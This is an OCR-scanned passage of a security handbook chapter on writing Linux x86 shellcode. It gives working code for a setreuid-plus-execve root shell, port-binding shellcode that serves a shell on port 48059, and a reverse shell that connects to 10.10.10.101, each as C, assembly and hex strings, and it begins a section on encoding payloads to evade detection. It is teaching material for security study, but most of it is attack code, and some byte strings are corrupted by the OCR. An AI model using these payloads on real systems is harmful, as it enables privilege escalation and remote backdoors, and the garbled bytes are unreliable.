mov al, 0x01 
int 0x80 



keeps the linker from complaining or guessing 
shortcut to zero out the eax register (safely) 
shortcut to zero out the ebx register, see note 
only affects one byte, stops padding of other 24 bits 
call kernel to execute syscall 



We have left out the exit_group(0) syscall because it is not necessary. 

Later it will become important that we eliminate null bytes from our hex opcodes, 
as they will terminate strings prematurely. We have used the instruction mov al, 0x01 
to eliminate null bytes. The instruction move eax, 0x01 translates to hex B8 01 00 00 00 
because the instruction automatically pads to 4 bytes. In our case, we only need to copy 
1 byte, so the 8-bit equivalent of eax was used instead. 




NOTE If you xor a number (bitwise) with itself, you get zero. This is 
preferable to using something like move ax, 0, because that operation leads 
to null bytes in the opcodes, which will terminate our shellcode when we 
place it into a string. 



In the next section, we will put the pieces together. 



Assemble, Link, and Test 

Once we have the assembly file, we can assemble it with nasm, link it with Id, then 
execute the file as shown: 

$nasm -f elf exit. asm 
$ Id exit.o -o exit 
$ . /exit 



Not much happened, because we simply called exit(0), which exited the process 
politely. Luckily for us, there is another way to verify. 



Verify with strace 

As in our previous example, you may need to verify the execution of a binary to ensure 
that the proper system calls were executed. The strace tool is helpful: 

o 

_exit(0) = ? 



As we can see, the _exit(0) syscall was executed! Now let's try another system call. 



setreuid System Call 

As discussed in Chapter 11, the target of our attack will often be an SUID program. 
However, well-written SUID programs will drop the higher privileges when not needed. 
In this case, it may be necessary to restore those privileges before taking control. The 
setreuid system call is used to restore (set) the process's real and effective user IDs. 



PART III 




Gray Hat Hacking, The Ethical Hacker's Handbook, Third Edition 

111 



setreuid Signature 

Remember, the highest privilege to have is that of root (0). The signature of the 
setreuid(0,0) system call is as follows: 

• eax 0x46 for syscall # 70 (from the unistd.h file earlier) 

• ebx First parameter, real user ID (ruid), in this case 0x0 

• ecx Second parameter, effective user ID (euid), in this case 0x0 

This time, we will start directly with the assembly. 

Starting with Assembly 

The following assembly file will execute the setreuid(0,0) system call: 

$ cat setreuid. asm 

section .text ; start the code section of the asm 
global _start ; declare a global label 

_start: ; keeps the linker from complaining or guessing 

xor eax, eax ; clear the eax registry, prepare for next line 

mov al, 0x46 ; set the syscall value to decimal 70 or hex 46, one byte 

xor ebx, ebx ; clear the ebx registry, set to 0 

xor ecx, ecx ; clear the ecx registry, set to 0 

int 0x80 ; call kernel to execute the syscall 

mov al, 0x01 ; set the syscall number to 1 for exit() 

int 0x80 ; call kernel to execute the syscall 

As you can see, we simply load up the registers and call int 0x80. We finish the func- 
tion call with our exit(O) system call, which is simplified because ebx already contains 
the value 0x0. 

Assemble, Link, and Test 

As usual, assemble the source file with nasm, link the file with Id, then execute the 
binary: 

$ nasm -f elf setreuid. asm 
$ Id -o setreuid setreuid. o 
$ ./setreuid 

Verify with strace 

Once again, it is difficult to tell what the program did; strace to the rescue: 

o 

setreuid(0, 0) =0 

_exit(0) = ? 

Ah, just as we expected! 

Shell-Spawning Shellcode with execve 

There are several ways to execute a program on Linux systems. One of the most widely 
used methods is to call the execve system call. For our purpose, we will use execve to 
execute the /bin/sh program. 
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execve Syscall 

As discussed in the man page at the beginning of this chapter, if we wish to execute the 
/bin/sh program, we need to call the system call as follows: 

char * shell[2]; //set up a temp array of two strings 

shell [0] ="/bin/sh" ; //set the first element of the array to "/bin/sh" 

shell [ 1 ] ="0" ; //set the second element to null 

execve (shell [0] , shell , null) //actual call of execve 

where the second parameter is a two-element array containing the string "/bin/sh" and 
terminated with a null. Therefore, the signature of the execve("/bin/sh", ["/bin/sh", 
NULL], NULL) syscall is as follows: 

• eax Oxb for syscall #11 (actually al:0xb to remove nulls from opcodes) 

• ebx The char * address of /bin/sh somewhere in accessible memory 

• ecx The char * argv[], an address (to an array of strings) starting with the 
address of the previously used /bin/sh and terminated with a null 

• edx Simply a 0x0, since the char * env[] argument may be null 

The only tricky part here is the construction of the "/bin/sh" string and the use of 
its address. We will use a clever trick by placing the string on the stack in two chunks 
and then referencing the address of the stack to build the register values. 



Starting with Assembly 

The following assembly code executes setreuid(0,0), then calls execve "/bin/sh": 



$ cat sc2.asm 



section 


. text 


global 


start 


start : 




;setreuid (0,0) 


xor eax. 


eax 


mov al. 


0x46 


xor ebx. 


ebx 


xor ecx. 


ecx 


int 0x80 




/spawn shellcode 


xor eax. 


eax 


push eax 




push 0x68732f2f 


push 0x6e69622f 


mov ebx. 


esp 


push eax 




push ebx 




mov ecx. 


esp 


xor edx. 


edx 


mov al. 


Oxb 


int 0x80 





; start the code section of the asm 
; declare a global label 

; get in the habit of using code labels 
; as we have already seen... 

; clear the eax registry, prepare for next line 
; set the syscall # to decimal 70 or hex 46, one byte 
; clear the ebx registry 

; clear the exc registry 

; call the kernel to execute the syscall 

with execve 

; clears the eax registry, sets to 0 
; push a NULL value on the stack, value of eax 
; push ' //sh ' onto the stack, padded with leading '/' 

; push /bin onto the stack, notice strings in reverse 

; since esp now points to "/bin/sh", write to ebx 

; eax is still NULL, let's terminate char ** argv on stack 
; still need a pointer to the address of '/bin/sh', use ebx 
; now esp holds the address of argv, move it to ecx 
; set edx to zero (NULL) , not needed 
; set the syscall # to decimal 11 or hex b, one byte 
; call the kernel to execute the syscall 
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As just shown, the /bin/sh string is pushed onto the stack in reverse order by first 
pushing the terminating null value of the string, then pushing the //sh (4 bytes are 
required for alignment and the second / has no effect), and finally pushing the /bin 
onto the stack. At this point, we have all that we need on the stack, so esp now points 
to the location of /bin/sh. The rest is simply an elegant use of the stack and register 
values to set up the arguments of the execve system call. 

Assemble, Link, and Test 

Let's check our shellcode by assembling with nasm, linking with Id, making the 
program an SUID, and then executing it: 

$ nasm -f elf sc2.asm 
$ Id -o sc2 sc2.o 
$ sudo chown root sc2 
$ sudo chmod +s sc2 
$ ./sc2 

sh-2.05b# exit 



Wow! It worked! 



Extracting the Hex Opcodes (Shellcode) 

Remember, to use our new program within an exploit, we need to place our program 
inside a string. To obtain the hex opcodes, we simply use the objdump tool with the 
-d flag for disassembly: 

$ objdump -d ./sc2 

./sc2: file format elf32-i386 

Disassembly of section .text: 

08048080 < start> : 



8048080 


31 


cO 


xor 


%eax, 


%eax 


8048082 


bO 


46 


mov 


$0x46 


, %al 


8048084 


31 


db 


xor 


%ebx. 


%ebx 


8048086 


31 


c9 


xor 


%ecx, 


%ecx 


8048088 


cd 


80 


int 


$0x80 




804808a 


31 


cO 


xor 


%eax, 


%eax 


804808c 


50 




push 


%eax 




804808d 


68 


2f 2f 73 68 


push 


$Ox68732f2f 


8048092 


68 


2f 62 69 6e 


push 


$Ox6e69622f 


8048097 


89 


e3 


mov 


%esp. 


%ebx 


8048099 


50 




push 


%eax 




804809a 


53 




push 


%ebx 




804809b 


89 


el 


mov 


%esp, 


%ecx 


804809d 


31 


d2 


xor 


%edx, 


%edx 


804809f 


bO 


0b 


mov 


$Oxb, 


%al 


80480al 


cd 


80 


int 


$0x80 




The most important thing about this printout 


is to verify that no null characters 



(\x00) are present in the hex opcodes. If there are any null characters, the shellcode will 
fail when we place it into a string for injection during an exploit. 
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NOTE The output of objdump is provided in AT&T (gas) format. As 
discussed in Chapter 10, we can easily convert between the two formats (gas 
and nasm).A close comparison between the code we wrote and the provided 
gas format assembly shows no difference. 



Testing the Shellcode 

To ensure that our shellcode will execute when contained in a string, we can craft the 
following test program. Notice how the string (sc) may be broken into separate lines, 
one for each assembly instruction. This aids with understanding and is a good habit to 
get into. 



char sc[] = //white space, 


such 


as carriage returns doesn't matter 


// setreuid (0, 0) 


"\x31\xc0" 


// 


xor 


%eax, %eax 


"\xb0\x46" 


// 


mov 


$0x46, %al 


"\x31\xdb" 


// 


xor 


%ebx, %ebx 


"\x31\xc9" 


// 


xor 


%ecx, %ecx 


"\xcd\x80" 


// 


int 


$0x80 


// spawn shellcode with 
"\x31\xc0" 


execve 
// xor 


%eax, %eax 


"\x50" 


// 


push 


%eax 


"\x68\x2 i:\x2f\x73\x68" 


// 


push 


$0x68732f2f 


"\x68\x2 i:\x62\x69\x6e" 


// 


push 


$0x6e69622f 


"\x89\xe3" 


// 


mov 


%esp, %ebx 


"\x50" 


// 


push 


%eax 


"\x53" 


// 


push 


%ebx 


"\x89\xel" 


// 


mov 


%esp, %ecx 


" \x31 \xd2 " 


// 


xor 


%edx, %edx 


"\xb0\x0b" 


// 


mov 


$0xb, %al 


"\xcd\x80"; 


// 


int 


$0x80 (;) terminates the strii 


main ( ) 


void (*fp) (void) ; 


// 


declare 


a function pointer, fp 


fp = (void *)sc; 


// 


set the 


address of fp to our shellcode 


fp ( ) ; 


// 


execute 


the function (our shellcode) 



This program first places the hex opcodes (shellcode) into a buffer called sc[]. Next, 
the main function allocates a function pointer called fp (simply a 4-byte integer that 
serves as an address pointer, used to point at a function). The function pointer is then 
set to the starting address of sc[]. Finally, the function (our shellcode) is executed. 
Now compile and test the code: 

$ gcc -o sc2 sc2.c 
$ sudo chown root sc2 
$ sudo chmod +s sc2 
$ ./sc2 

sh-2.05b# exit 
exit 
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As expected, the same results are obtained. Congratulations, you can now write 
your own shellcode! 
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Implementing Port-Binding Shellcode 

As discussed in the last chapter, sometimes it is helpful to have your shellcode open a 
port and bind a shell to that port. That way, you no longer have to rely on the port on 
which you gained entry, and you have a solid backdoor into the system. 

Linux Socket Programming 

Linux socket programming deserves a chapter to itself, if not an entire book. However, 
it turns out that there are just a few things you need to know to get off the ground. The 
finer details of Linux socket programming are beyond the scope of this book, but here 
goes the short version. Buckle up again! 

C Program to Establish a Socket 

In C, the following header files need to be included into your source code to build 
sockets: 

#include<sys/socket ,h> //libraries used to make a socket 

#include<netinet/in ,h> //defines the sockaddr structure 

The first concept to understand when building sockets is byte order, discussed next. 

IP Networks Use Network Byte Order 

As you learned before, when programming on Linux systems, you need to understand 
that data is stored into memory by writing the lower-order bytes first; this is called little- 
endian notation. Just when you got used to that, you need to understand that IP net- 
works work by writing the high-order byte first; this is referred to as network byte order. 

In practice, this is not difficult to work around. You simply need to remember that bytes 
will be reversed into network byte order prior to being sent down the wire. 

The second concept to understand when building sockets is the sockaddr stmcture. 

sockaddr Structure 

In C programs, structures are used to define an object that has characteristics contained 
in variables. These characteristics or variables may be modified, and the object may be 
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passed as an argument to functions. The basic structure used in building sockets is 
called a sockaddr. The sockaddr looks like this: 

struct sockaddr { 

unsigned short sa_family; /*address family*/ 

char sa_data[14]; /*address data*/ 

} ; 



The basic idea is to build a chunk of memory that holds all the critical information 
of the socket, namely the type of address family used (in our case IP, Internet Protocol), 
the IP address, and the port to be used. The last two elements are stored in the sa_data 
field. 

To assist in referencing the fields of the structure, a more recent version of sockaddr 
was developed: sockaddr_in. The sockaddr_in structure looks like this: 

struct sockaddr_in { 

short int sin_family /* Address family */ 

unsigned short int sin_port; /* Port number */ 

struct in_addr sin_addr; /* Internet address */ 

unsigned char sin_zero[8]; /* 8 bytes of null padding for IP */ 

}; 



The first three fields of this structure must be defined by the user prior to establish- 
ing a socket. We will be using an address family of 0x2, which corresponds to IP (net- 
work byte order). The port number is simply the hex representation of the port used. 
The Internet address is obtained by writing the octets of the IP address(each in hex no- 
tation) in reverse order, starting with the fourth octet. For example, 127.0.0.1 would be 
written 0x0100007F. The value of 0 in the sin_addr field simply means for all local ad- 
dresses. The sin_zero field pads the size of the structure by adding 8 null bytes. This 
may all sound intimidating, but in practice, we only need to know that the structure is 
a chunk of memory used to store the address family type, port, and IP address. Soon we 
will simply use the stack to build this chunk of memory. 

Sockets 

Sockets are defined as the binding of a port and an IP address to a process. In our case, 
we will most often be interested in binding a command shell process to a particular 
port and IP on a system. 

The basic steps to establish a socket are as follows (including C function calls): 

1. Build a basic IP socket: 

server=socket (2, 1, 0) 

2. Build a sockaddr_in structure with IP address and port: 

struct sockaddr_in serv_addr; //structure to hold IP/port vals 
serv_addr . sin_addr . s_addr=0; //set addresses of socket to all localhost IPs 
serv_addr . sin_port=OxBBBB; //set port of socket, in this case to 48059 
serv_addr . sin_f amily=2 ; //set native protocol family: IP 

3. Bind the port and IP to the socket: 

bind (server, (struct sockaddr * ) &serv_addr , 0x10 ) 
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4. Start the socket in listen mode; open the port and wait for a connection: 

listen (server, 0) 

5. When a connection is made, return a handle to the client: 

client=accept (server, 0, 0) 

6. Copy stdin, stdout, and stderr pipes to the connecting client: 

dup2 (client, 0), dup2 (client, 1), dup2 (client, 2) 

7. Call normal execve shellcode, as in the first section of this chapter: 

char * shell [2]; //set up a temp array of two strings 

shell [0] ="/bin/sh"; //set the first element of the array to "/bin/sh" 

shell [ 1 ] ="0" ; //set the second element to null 

execve (shell [0] , shell , null) //actual call of execve 



port_bind.c 

To demonstrate the building of sockets, let's start with a basic C program: 



$ cat . /port_bind. c 
#include<sys/ socket ,h> 
#include<netinet/in . h> 
int main ( ) { 

char * shell [ 2 ] ; 

int server , client; 

struct sockaddr in serv addr; 



//libraries used to make a socket 
//defines the sockaddr structure 

//prep for execve call 
//file descriptor handles 
//structure to hold IP/port vals 



} 



server=socket (2, 1, 0) ; //build a local IP socket of type stream 

serv_addr . sin_addr . s_addr=0; //set addresses of socket to all local 

serv_addr . sin_port=0xBBBB; //set port of socket, 48059 here 

serv__addr . sin_f amily=2 ; //set native protocol family: IP 

bind (server, (struct sockaddr * ) &serv__addr , 0x10 ) ; //bind socket 

listen (server, 0) ; //enter listen state, wait for connect 

client=accept (server, 0, 0) ; //when connect, return client handle 

/♦connect client pipes to stdin, stdout, stderr */ 

dup2 (client, 0) ; //connect stdin to client 

dup2 (client, 1 ) ; //connect stdout to client 

dup2 (client, 2 ) ; //connect stderr to client 

shell [0] ="/bin/sh" ; //first argument to execve 

shell [ 1 ] =0 ; //terminate array with null 

execve (shell [0] , shell, 0) ; //pop a shell 



This program sets up some variables for use later to include the sockaddr_in struc- 
ture. The socket is initialized and the handle is returned into the server pointer (int 
serves as a handle). Next, the characteristics of the sockaddr_in structure are set. The 
sockaddr_in structure is passed along with the handle to the server to the bind function 
(which binds the process, port, and IP together). Then the socket is placed in the listen 
state, meaning it waits for a connection on the bound port. When a connection is made, 
the program passes a handle to the socket to the client handle. This is done so that the 
stdin, stdout, and stderr of the server can be duplicated to the client, allowing the client 
to communicate with the server. Finally, a shell is popped and returned to the client. 
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Assembly Program to Establish a Socket 

To summarize the previous section, the basic steps to establish a socket are 

• server=socket(2,l,0) 

• bind(server, (struct sockaddr *)&serv_addr,OxlO) 

• listen(server, 0) 

• cl i e n t = accep t ( s e rve r, 0, 0) 

• dup2(client, 0), dup2(client, 1), dup2(client, 2) 

• execve "/bin/sh" 

There is only one more thing to understand before moving to the assembly. 

socketcall System Call 

In Linux, sockets are implemented by using the socketcall system call (102). The 
socketcall system call takes two arguments: 

• ebx An integer value, defined in /usr/include/net.h 
To build a basic socket, you will only need 

• SYS_SOCKET 1 

• SYS_BIND 2 

• SYS_CONNECT 3 

• SYS_LISTEN 4 

• SYS_ACCEPT 5 

• ecx A pointer to an array of arguments for the particular function 

Believe it or not, you now have all you need to jump into assembly socket pro- 
grams. 

port_bind_asm.asm 

Armed with this info, we are ready to start building the assembly of a basic program to 
bind the port 48059 to the localhost IP and wait for connections. Once a connection is 
gained, the program will spawn a shell and provide it to the connecting client. 




NOTE The following code segment may seem intimidating, but it is quite 
simple. Refer to the previous sections, in particular the last section, and realize 
that we are just implementing the system calls (one after another). 



# cat . /port_bind_asm. asm 
BITS 32 
section .text 
global _start 
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start : 



xor eax, eax 


; 


clear eax 




xor ebx, ebx 


; 


clear ebx 




xor edx, edx 




clear edx 




; server=socket (2 


,1,0) 




push 


eax 


; 


third arg to socket: 0 




push 


byte Oxl 


; 


second arg to socket: 1 




push 


byte 0x2 


; 


first arg to socket: 2 




mov 


ecx, esp 


; 


set addr of array as 2 nd arg to socketcall 




inc 


bl 


; 


set first arg to socketcall to # 1 




mov 


al, 102 




; call socketcall # 1 : SYS SOCKET 




int 


0x80 




; jump into kernel mode, execute the syscall 




mov 


esi , eax 




; store the return value (eax) into esi (server) 




;bind 


(server, (struct sockaddr *)Sserv addr,0xl0) 




push 


edx 




; still zero, terminate the next value pushed 




push 


long 0xBBBB02BB ; build struct : port , sin . family : 02 , & any 2bytes 


BB 


mov 


ecx, esp 




; move addr struct (on stack) to ecx 




push 


byte 0x10 


; begin the bind args, push 16 (size) on stack 




push 


ecx 




; save address of struct back on stack 




push 


esi 




; save server file descriptor (now in esi) to 


stack 


mov 


ecx, esp 




; set addr of array as 2 arg to socketcall 




inc 


bl 




; set bl to # 2, first arg of socketcall 




mov 


al, 102 




; call socketcall # 2: SYS BIND 




int 


0x80 




; jump into kernel mode, execute the syscall 




; listen (server 


, 


0) 




push 


edx 




; still zero, used to terminate the next value 


pushed 


push 


esi 




; file descriptor for server (esi) pushed to stack 


mov 


ecx, esp 




; set addr of array as 2 nd arg to socketcall 




mov 


bl, 0x4 




; move 4 into bl, first arg of socketcall 




mov 


al, 102 




; call socketcall #4: SYS LISTEN 




int 


0x80 




; jump into kernel mode, execute the syscall 




; client=accept (server , 0, 0) 




push 


edx 




; still zero, third argument to accept pushed to stack 


push 


edx 




; still zero, second argument to accept pushed to stack 


push 


esi 




; saved file descriptor for server pushed to stack 




mov 


ecx, esp 




; args placed into ecx, serves as 2nd arg to socketcall 


inc 


bl 




; increment bl to 5, first arg of socketcall 




mov 


al, 102 




; call socketcall #5: SYS ACCEPT 




int 


0x80 




; jump into kernel mode, execute the syscall 




; prepare for 


dup2 commands, need client file handle saved in ebx 




mov 


ebx, eax 




; copied returned file descriptor of client to 


ebx 


; dup2 


(client. 


0) 






xor 


ecx, ecx 




; clear ecx 




mov 


al, 63 




; set first arg of syscall to 0x63: dup2 




int 


0x80 




; jump into 




; dup2 


(client. 


1) 






inc 


ecx 




; increment ecx to 1 




mov 


al, 63 




; prepare for syscall to dup2:63 




int 


0x80 




; jump into 




; dup2 


(client. 


2) 






inc 


ecx 




; increment ecx to 2 




mov 


al, 63 




; prepare for syscall to dup2:63 




int 


0x80 




; jump into 
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; standard execve ("/bin/sh" . . . 
push edx 

push long 0x68732f2f 

push long 0x6e69622f 

mov ebx,esp 

push edx 

push ebx 

mov ecx,esp 

mov al, 0x0b 

int 0x80 

# 

That was quite a long piece of assembly, but you should be able to follow it by now. 




NOTE Port OxBBBB = decimal 48059. Feel free to change this value and 
connect to any free port you like. 



Assemble the source file, link the program, and execute the binary: 



# nasm -f elf port_bind_asm. asm 

# Id -o port_bind_asm port_bind_asm. o 

# . /port_bind_asm 



At this point, we should have an open port: 48059. Let's open another command 
shell and check: 



# netstat -pan | grep port_bind_asm 

tcp 0 0 0.0.0.0:48059 0.0. 0.0:* LISTEN 

10656/port_bind 

Looks good; now fire up netcat, connect to the socket, and issue a test command: 

# nc localhost 48059 
id 

uid=0(root) gid=0(root) groups=0 (root) 



Yep, it worked as planned. Smile and pat yourself on the back; you earned it. 



Test the Shellcode 

Finally, we get to the port binding shellcode. We need to carefully extract the hex 
opcodes and then test them by placing the shellcode into a string and executing it. 



Extracting the Hex Opcodes 

Once again, we fall back on using the objdump tool: 

Sobjdump -d . /port_bind_asm 
port_bind: file format elf32-i386 

Disassembly of section .text: 



%eax, %eax 
%ebx, %ebx 



08048080 <_start> : 
8048080: 31 cO 

8048082: 31 db 



xor 

xor 
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8048084 


31 


d2 








xor 


%edx, %edx 


8048086 


50 










push 


%eax 


8048087 


6a 


01 








push 


$0x1 


8048089 


6a 


02 








push 


$0x2 


804808b 


89 


el 








mov 


%esp, %ecx 


804808d 


fe 


c3 








inc 


%bl 


804808f 


bO 


66 








mov 


$0x66, %al 


8048091 


cd 


80 








int 


$0x80 


8048093 


89 


c6 








mov 


%eax, %esi 


8048095 


52 










push 


%edx 


8048096 


68 


aa 


02 


aa 


aa 


push 


$0xaaaa02aa 


804809b 


89 


el 








mov 


%esp, %ecx 


804809d 


6a 


10 








push 


$0x10 


804809f 


51 










push 


%ecx 


80480a0 


56 










push 


%esi 


80480al 


89 


el 








mov 


%esp, %ecx 


80480a3 


fe 


c3 








inc 


%bl 


80480a5 


bO 


66 








mov 


$0x66, %al 


80480a7 


cd 


80 








int 


$0x80 


80480a9 


52 










push 


%edx 


80480aa 


56 










push 


%esi 


80480ab 


89 


el 








mov 


%esp, %ecx 


80480ad 


b3 


04 








mov 


$0x4, %bl 


80480af 


bO 


66 








mov 


$0x66, %al 


80480bl 


cd 


80 








int 


$0x80 


80480b3 


52 










push 


%edx 


80480b4 


52 










push 


%edx 


80480b5 


56 










push 


%esi 


80480b6 


89 


el 








mov 


%esp, %ecx 


80480b8 


fe 


c3 








inc 


%bl 


80480ba 


bO 


66 








mov 


$0x66, %al 


80480bc 


cd 


80 








int 


$0x80 


80480be 


89 


c3 








mov 


%eax, %ebx 


80480c0 


31 


c9 








xor 


%ecx, %ecx 


80480c2 


bO 


3f 








mov 


$0x3f , %al 


80480c4 


cd 


80 








int 


$0x80 


80480c6 


41 










inc 


%ecx 


80480c7 


bO 


3f 








mov 


$0x3f , %al 


80480c9 


cd 


80 








int 


$0x80 


80480cb 


41 










inc 


%ecx 


80480cc 


bO 


3f 








mov 


$0x3f , %al 


80480ce 


cd 


80 








int 


$0x80 


80480d0 


52 










push 


%edx 


80480dl 


68 


2f 


2f 


73 


68 


push 


$0x68732f2f 


80480d6 


68 


2f 


62 


69 


6e 


push 


$0x6e69622f 


80480db 


89 


e3 








mov 


%esp, %ebx 


80480dd 


52 










push 


%edx 


80480de 


53 










push 


%ebx 


80480df 


89 


el 








mov 


%esp, %ecx 


80480el 


bO 


0b 








mov 


$0xb, %al 


80480e3 


cd 


80 








int 


$0x80 



A visual inspection verifies that we have no null characters (\x00), so we should be 
good to go. Now fire up your favorite editor (vi is a good choice) and turn the opcodes 
into shellcode. 

port_bind_sc.c 

Once again, to test the shellcode, we will place it into a string and run a simple test 
program to execute the shellcode: 
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# cat port_bind_sc . c 

char sc[]= // our new port binding shellcode, all here to save pages 

"\x31\xc0\x31\xdb\x31\xd2\x50\x6a\x01\x6a\x02\x89\xel\xfe\xc3\xb0" 
"\x66\xcd\x80\x89\xc6\x52\x68\xbb\x02\xbb\xbb\x89\xel\x6a\xl0\x51" 
"\x56\x89\xel\xfe\xc3\xb0\x66\xcd\x80\x52\x56\x89\xel\xb3\x04\xb0" 
"\x66\xcd\x80\x52\x52\x56\x89\xel\xfe\xc3\xb0\x66\xcd\x80\x89\xc3" 
"\x31\xc9\xb0\x3f \xcd\x80\x41\xb0\x3f \xcd\x80\x41\xb0\x3f \xcd\x80" 
"\x52\x68\x2 i:\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89" 
"\xel\xb0\x0b\xcd\x80" ; 
main ( ) { 

void (*fp) (void); // declare a function pointer, fp 

fp = (void *)sc; // set the address of the fp to our shellcode 

fp(); // execute the function (our shellcode) 

} 



Compile the program and start it: 

# gcc -o port_bind_sc port_bind_sc.c 

# . /port_bind_sc 

In another shell, verify the socket is listening. Recall, we used the port OxBBBB in 
our shellcode, so we should see port 48059 open. 

# netstat -pan I grep port_bind_sc 

tcp 0 0 0.0.0.0:48059 0.0. 0.0:* LISTEN 

21326/port_bind_sc 




CAUTION When testing this program and the others in this chapter, if you 
run them repeatedly, you may get a state of TIME WAIT or FIN WAIT. You will 
need to wait for internal kernel TCP timers to expire, or simply change the 
port to another one if you are impatient. 



Finally, switch to a normal user and connect: 



# su joeuser 

$ nc localhost 48059 

id 

uid=0 (root) gid=0(root) groups=0 (root) 
exit 
$ 



Success! 
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Implementing Reverse Connecting Shellcode 

The last section was informative, but what if the vulnerable system sits behind a firewall 
and the attacker cannot connect to the exploited system on a new port? As discussed in 
the previous chapter, attackers will then use another technique: have the exploited 
system connect back to the attacker on a particular IP and port. This is referred to as a 
reverse connecting shell. 



Reverse Connecting C Program 

The good news is that we only need to change a few things from our previous port bind- 
ing code: 

1. Replace bind, listen, and accept functions with a connect. 

2. Add the destination address to the sockaddr structure. 

3. Duplicate the stdin, stdout, and stderr to the open socket, not the client 
as before. 

Therefore, the reverse connecting code looks like this: 

$ cat reverse_connect.c 

#include<sys/socket ,h> //same includes of header files as before 

#include<netinet/ in . h> 

int main ( ) 



char * shell [ 2 ] ; 

int soc, remote; //same declarations as last time 

struct sockaddr_in serv_addr; 

serv^addr . sin_f amily=2 ; // same setup of the sockaddr_in 
serv_addr . sin_addr . s_addr=0x650A0A0A; / / 10 . 10. 10. 101 
serv_addr . sin_port=0xBBBB; // port 48059 
soc=socket (2,1,0); 

remote = connect (soc, (struct sockaddr*) &serv_addr, 0x10) ; 
dup2(soc,0); //notice the change, we dup to the socket 

dup2(soc,l); //notice the change, we dup to the socket 

dup2(soc,2); //notice the change, we dup to the socket 

shell [0] ="/bin/sh"; //normal setup for execve 
shell [ 1 ] =0 ; 

execve (shell [0] , shell, 0) ; / /boom! 




CAUTION The previous code has hardcoded values in it. You may need to 
change the IP given before compiling for this example to work on your system. 
If you use an IP that has a 0 in an octet (for example, 1 27.0.0. 1 ), the resulting 
shellcode will contain a null byte and not work in an exploit.To create the IP, 
simply convert each octet to hex and place them in reverse order (byte by byte). 



Now that we have new C code, let's test it by firing up a listener shell on our system 
at IP 10.10.10.101: 



https://www.facebook.eom/pages/Download-from-harks/1 2420175441 7002 



Chapter 14: Writing Linux Shellcode 

285 

$ nc -nlvv -p 48059 
listening on [any] 48059 . . . 

The -nlw flags prevent DNS resolution, set up a listener, and set netcat to very verbose 
mode. 

Now compile the new program and execute it: 

# gcc -o reverse_connect reverse_connect . c 

# ,/reverse_connect 

On the listener shell, you should see a connection. Go ahead and issue a test com- 
mand: 

connect to [10.10.10.101] from (UNKNOWN) [10.10.10.101] 38877 
id; 

uid=0 (root) gid=0(root) groups=0 (root) 

It worked! 

Reverse Connecting Assembly Program 

Again, we will simply modify our previous port_bind_asm.asm example to produce 
the desired effect: 

$ cat . / reverse_connect_asm . asm 

BITS 32 

section .text 

global _start 

_start : 

xor eax, eax ; clear eax 

xor ebx,ebx ; clear ebx 

xor edx,edx ; clear edx 

; socket (2,1,0) 

push eax ; third arg to socket: 0 

push byte 0x1 ; second arg to socket: 1 
push byte 0x2 ; first arg to socket: 2 

mov ecx,esp ; move the ptr to the args to ecx (2nd arg to socketcall) 

inc bl ; set first arg to socketcall to # 1 

mov al,102 ; call socketcall # 1: SYS_SOCKET 

int 0x80 ; jump into kernel mode, execute the syscall 

mov esi,eax ; store the return value (eax) into esi 

;the next block replaces the bind, listen, and accept calls with connect 
; client=connect (server , (struct sockaddr * ) &serv_addr , 0x10 ) 

push edx ; still zero, used to terminate the next value pushed 

push long 0x650A0A0A ; extra this time, push the address in reverse hex 

push word OxBBBB ; push the port onto the stack, 48059 in decimal 

xor ecx, ecx ; clear ecx to hold the sa_family field of struck 

mov cl, 2 ; move single byte: 2 to the low order byte of ecx 

push word cx ; ; build struct, use port, sin . family : 0002 four bytes 

mov ecx,esp ; move addr struct (on stack) to ecx 

push byte 0x10 ; begin the connect args, push 16 stack 

push ecx ; save address of struct back on stack 

push esi ; save server file descriptor (esi) to stack 

ecx,esp ; store ptr to args to ecx (2nd arg of socketcall) 



mov 
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mov bl,3 ; set bl to # 3, first arg of socketcall 

mov al,102 ; call socketcall # 3: SYS_CONNECT 

int 0x80 ; jump into kernel mode, execute the syscall 



; prepare for dup2 commands, need client file handle saved in ebx 
mov ebx,esi ; copied soc file descriptor of client to ebx 



;dup2 (soc, 0) 
xor ecx, ecx 
mov al , 63 
int 0x80 



clear ecx 

set first arg of syscall to 63: dup2 
jump into 



;dup2 (soc, 1) 
inc ecx 
mov al , 63 
int 0x80 



increment ecx to 1 

prepare for syscall to dup2:63 

jump into 



;dup2 (soc, 2) 
inc ecx 
mov al , 63 
int 0x80 



; increment ecx to 2 
; prepare for syscall to dup2:63 
; jump into 



;standard execve ("/bin/sh" . . . 
push edx 

push long 0x68732f2f 
push long 0x6e69622f 
mov ebx,esp 
push edx 
push ebx 
mov ecx,esp 
mov al, 0x0b 
int 0x80 



As with the C program, this assembly program simply replaces the bind, listen, and 
accept system calls with a connect system call instead. There are a few other things to 
note. First, we have pushed the connecting address to the stack prior to the port. Next, 
notice how the port has been pushed onto the stack, and then how a clever trick is used 
to push the value 0x0002 onto the stack without using assembly instructions that will 
yield null characters in the final hex opcodes. Finally, notice how the dup2 system calls 
work on the socket itself, not the client handle as before. 

Okay, let's try it: 



$ nc -nlvv -p 48059 
listening on [any] 48059 . . . 

In another shell, assemble, link, and launch the binary: 



$ nasm -f elf reverse_connect_asm. asm 
$ Id -o port_connect rever se_connect_asm . o 
$ . / rever se_connect_asm 

Again, if everything worked well, you should see a connect in your listener shell. 

Issue a test command: 

connect to [10.10.10.101] from (UNKNOWN) [10.10.10.101] 38877 
id; 

uid=0 (root) gid=0(root) groups=0 (root) 
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It will be left as an exercise for you to extract the hex opcodes and test the resulting 
shellcode. 

References 

Linux Socket Programming (Sean Walton) Sams Publishing, 2001 

Linux Reverse Shell www.packetstormsecurity.org/shellcode/connect-back.c 

"Smashing the Stack for Fun and Profit" (Aleph One) 

www. p h r a c k . co m / i s s u e s . h t rn 1 ? i s s u e = 4 9 & i d =1 4 # a rt i c 1 e 

"The Art of Writing Shellcode" (smiler) 

www.cash.sopot.kill.pl/shellcode/art-shellcode.txt 

"Writing Shellcode" (zillion) www.safemode.org/files/zillion/shellcode/doc/ 
Writing_shellcode.html 

Encoding Shellcode 

Some of the many reasons to encode shellcode include: 

• Avoiding bad characters (\xOO, \xa9, and so on) 

• Avoiding detection of IDS or other network-based sensors 

• Conforming to string filters, for example, tolower() 

In this section, we cover encoding shellcode, with examples included. 

Simple XOR Encoding 

A simple parlor trick of computer science is the "exclusive or" (XOR) function. The XOR 
function works like this: 

0 XOR 0=0 

0 XOR 1=1 

1 XOR 0=1 
1 XOR 1=0 

The result of the XOR function (as its name implies) is true (Boolean 1) if and only 
